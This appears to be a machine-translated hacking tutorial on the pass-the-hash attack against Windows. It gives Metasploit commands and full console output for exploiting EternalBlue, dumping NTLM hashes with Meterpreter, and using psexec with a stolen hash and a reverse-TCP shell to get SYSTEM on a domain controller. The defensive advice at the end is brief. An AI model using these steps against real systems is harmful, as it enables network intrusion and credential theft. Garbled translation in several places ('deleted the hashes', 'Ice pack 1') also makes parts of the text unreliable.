Windows passwords are stored as hashes and are sometimes hard to crack. However, in certain situations we can work around this by using the hash as it is without having to know the plaintext password. It's especially interesting to be able to retrieve the hash of an administrative user, because then we can authenticate ourselves with higher privileges by executing an attack called a pass-the-hash.
We will first compromise a Windows 7 box and get a hash of it The user whose password we have received must have administrator privileges and be logged on to both computers. We will use Kali Linux as our attack box.
Submitting the hash synopsis
To understand the pass-the-hash technique, we first need to explain what the hash consists of. In Windows, a typical hash looks like this:
admin2: 1000: aad3b435b51404eeaad3b435b51404ee: 7178d3046e7ccfac0469f95588b6bdf7 :::
There are four sections separated by semicolons. The first part of the hash is the username and the second part is the relative numeric identifier.
The third part is the LM hash, a kind of hash that was used in older Windows systems and was discontinued from Vista / Server 2008. They do not see much, but it's still possible to find them if older systems are still used. If you do, you are lucky, because they are trivial to crack.
The fourth part is the NTLM hash, an updated version that is used on modern Windows systems and is much harder to crack. It is sometimes referred to as NTHash and is what we can use to pass the hash.
Our attack works because of the way passwords are stored, transmitted, and used for authentication. Think about it: your password will not be displayed as plain text to anyone on the network – it's been hashed cryptographically from the moment it's created.
When authenticating with a user name and password, the password is hashed as soon as you type it In the end, the computer does not see any difference between the password and the hash at the end. By providing the authentication mechanism with the hash directly, we can avoid the need to know the plaintext password.
This is particularly interesting because we as an administrator can only authenticate with the password hash, as long as we know the username.
Step 1: Get the hash from the original target
First, we must endanger the original target. In this scenario, this is assumed to be a normal workstation (our Windows 7 computer). Any method will work, but for the moment we assume that this machine is vulnerable to EternalBlue.
~ # msfconsole msf5>
Then let's run an "eternal blue" module. For more information about this module, see my previous manual on using EternalBlue on a Windows server.
msf5> Use exploit / windows / smb / ms17_010_eternalblue Execute msf5 exploit (windows / smb / ms17_010_eternalblue)> [*] The reverse TCP handler was started on 10/10/0/12:34 [*] 10.10.0.104:445 - Establish connection to the target for exploitation. [+] 10.10.0.104:445 - Connection made for exploitation. [+] 10.10.0.104:445 - The selected target operating system is valid for the operating system specified in the SMB response [*] 10.10.0.104:445 - CORE raw buffer dump (42 bytes) [*] 10.10.0.104:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes [*] 10.10.0.104:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv [*] 10.10.0.104:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 Ice pack 1 [+] 10.10.0.104:445 - Target arc selected, valid for the arc specified by the DCE / RPC response [*] 10.10.0.104:445 - Attempted Exploit with 12 Groom Allocations. [*] 10.10.0.104:445 - All but the last fragment of an exploit package will be sent [*] 10.10.0.104:445 - Start the non-paged pool maintenance [+] 10.10.0.104:445 - Sending SMBv2 buffers [+] 10.10.0.104:445 - Close the SMBv1 connection, creating a free hole next to the SMBv2 buffer. [*] 10.10.0.104:445 - Sending the last SMBv2 buffer. [*] 10.10.0.104:445 - Last fragment of an exploit package is sent! [*] 10.10.0.104:445 - Response from the exploit package is received [+] 10.10.0.104:445 - ETERNALBLUE override successfully completed (0xC000000D)! [*] 10.10.0.104:445 - Send the egg to a damaged connection. [*] 10.10.0.104:445 - Trigger without damaged buffer. [*] Transmission Level (206403 Bytes) to 10.10.0.104 [*] Meter Session 1 has been opened at 2019-04-08 10:29:38 -0500 (10.10.0.1:1234 -> 10.10.0.104:49210) [+] 10.10.0.104:445 - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = [+] 10.10.0.104:445 - = - = - = - = - = - = - = - = - = - = - = - = - = - WIN - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = [+] 10.10.0.104:445 - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = meterpreter>
Meterpreter has a useful command called hashdump that prints out any LM or NTLM hashes on the system.
meterpreter> hashdump admin2: 1000: aad3b435b51404eeaad3b435b51404ee: 7178d3046e7ccfac0469f95588b6bdf7 ::: Administrator: 500: aad3b435b51404eeaad3b435b51404ee: 31d6cfe0d16ae931b73c59d7e0c089c0 ::: Guest: 501: aad3b435b51404eeaad3b435b51404ee: 31d6cfe0d16ae931b73c59d7e0c089c0 :::
It appears that there is a user named "admin2" who probably has administrator privileges. We can copy and use the hash to connect to another computer.
Let's say there is another computer on the network that looks like a server, possibly a domain controller (this is the Windows Server 2016 box). If we can access this computer, we can own the entire network and every computer in the domain.
Step 2: Pass the hash with PsExec.
Now that we have the hash of a privileged user, we can use it authentication on the windows server 2016 box without entering the plaintext password. We can do this with the Metasploit module psexec .
PsExec is a command-line tool on Windows that lets you run programs and commands on remote systems. It is useful for administrators because it integrates with console applications and utilities to seamlessly redirect input and output. However, there is always a trade-off between comfort and safety. PsExec can be used by an attacker to execute malicious commands or to act as a backdoor.
Metasploit includes a modified version of PsExec that makes it easy to connect to remote targets. Use the command search to locate the module:
msf5> search psexec Matching modules ================ # Name Disclosure Date Rank Exam Description - ---- ---------------- ---- ----- ----------- 1 additional / admin / smb / ms17_010_command 2017-03-14 normal Yes MS17-010 EternalRomance / EternalSynergy / EternalChampion SMB Remote Windows Command Execution 2 additional / admin / smb / psexec_command normal Yes Microsoft Windows Authenticated Administration Utility 3 additional / admin / smb / psexec_ntdsgrab normal No PsExec NTDS.dit and SYSTEM Hive Download Utility 4 auxiliary / scanner / smb / impacket / dcomexec 2018-03-19 normal Yes DCOM Exec 5 auxiliary / scanner / smb / impacket / wmiexec 2018-03-19 normal Yes WMI Exec 6 additional / scanner / smb / psexec_loggedin_users normal Yes Enumeration of logged-in users authenticated by Microsoft Windows 7 encoder / x86 / service manual No register service 8 exploit / windows / local / current_user_psexec 1999-01-01 excellent No PsExec on Current User Token 9 exploit / windows / local / wmi 1999-01-01 excellent No remote command execution with Windows Management Instrumentation (WMI) 10 Exploit / windows / smb / ms17_010_psexec 2017-03-14 normal No MS17-010 EternalRomance / EternalSynergy / EternalChampion SMB remote Windows code execution 11 Exploit / windows / smb / psexec 1999-01-01 Manual No execution of Microsoft Windows authenticated user code 12 exploit / windows / smb / psexec_psh 1999-01-01 manual No Microsoft Windows authenticated powershell command execution 13 exploit / windows / smb / webexec 2018-10-24 manual No WebExec authenticated user code execution
It's an oldie, but a goodie. Download it with the command use .
msf5> use exploit / windows / smb / psexec
Now we can display the current settings with the command options .  Msf5 exploit (Windows / smb / Psexec)> Options
Module options (Exploit / windows / smb / psexec):
Name Current setting Required Description
—- ————— ——– ———–
RHOSTS yes The destination address range or the CIDR identifier
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION not a service description to be used for a nice listing on the target
SERVICE_DISPLAY_NAME no The display name of the service
SERVICE_NAME no The service name
SHARE ADMIN $ yes The share to connect to can be an administrator share (ADMIN $, C $, …) or a normal read / write folder share
SMBDomain. no The Windows domain to use for authentication
SMBPass no The password for the specified user name
SMBUser no The user name under which to authenticate
Take advantage of the goal:
First, we need to set the IP address of the target (the server we are targeting now):
msf5 exploit (windows / smb / psexec)> set rhosts 10.10.0.100 rhosts => 10.10.0.100
Then we can set the username and password with the obtained hash instead of a plain text password.
msf5 exploit (windows / smb / psexec)> set smbuser admin2 smbuser => admin2 msf5 exploit (windows / smb / psexec)> set smbpass aad3b435b51404eeaad3b435b51404ee: 7178d3046e7ccfac0469f95588b6bdf7 smbpass => aad3b435b51404eeaad3b435b51404ee: 7178d3046e7ccfac0469f95588b6bdf7
Next, set the payload
payload => windows / x64 / meterpreter / reverse_tcp
And the IP address of our local machine and a desired port.
msf5 exploit (windows / smb / psexec)> set lhost 10.10.0.1 lhost => 10.10.0.1 Set Msf5 exploit (Windows / Smb / Psexec)> Lport 1234 lport => 1234
The remaining standard options are ok for the time being. So we should continue. Start it with the command run .
msf5 exploit (windows / smb / psexec)> run [*] The reverse TCP handler was started on 10/10/0/12:34 [*] 10.10.0.100:445 - Connection to the server is being established ... [*] 10.10.0.100:445 - Authenticated to 10.10.0.100:445 as user & # 39; admin2 & # 39; ... [*] 10.10.0.100:445 - Select a PowerShell destination [*] 10.10.0.100:445 - Execute the payload ... [*] Transmission Level (206403 bytes) to 10.10.0.100 [+] 10.10.0.100:445 - Timeout when starting the service, OK when running a command or executing an executable outside the service ... [*] Meter Session 2 has been opened at 2019-04-08 10:36:37 -0500 (10.10.0.1:1234 -> 10.10.0.100:49864) meterpreter>
And now we have a Meterpreter session. Commands such as getuid and sysinfo can be issued to confirm information about the destination.
meterpreter> getuid Server user name: NT AUTHORITY SYSTEM meterpreter> sysinfo Computer: DC01 Operating system: Windows 2016 (Build 14393). Architecture: x64 System language: de_DE Area: DLAB Logged in users: 4 Meterpreter: x64 / windows
Pretty neat. We did not even need a password – just the hash – to access the server. We own this system now.
It's generally quite difficult to defend against a pass-the-hash attack because it looks like a standard authentication. It is best to implement a in-depth defense approach to mitigate potential damage.
Keeping permissions to a minimum minimizes the damage that an attacker can do if they initially gain a foothold on the network. Other standard defense methods should also be used, eg. For example, use a firewall and IDS / IPS to monitor and prevent malicious activity.
Windows can also be configured to cach credentials, preventing attackers from collecting stored hashes. Additional steps can also be taken to isolate sensitive systems on the network to limit an attacker's pivot capability.
In this tutorial, we have misused information about Windows hashes, their use in authentication, and their ways to perform a pass-the-hash attack. After we compromised a low-level target, we deleted the hashes and found an administrator account. From there, we used metasploit to pass the hash and ultimately get system access to a server. If you have any questions, please provide them below.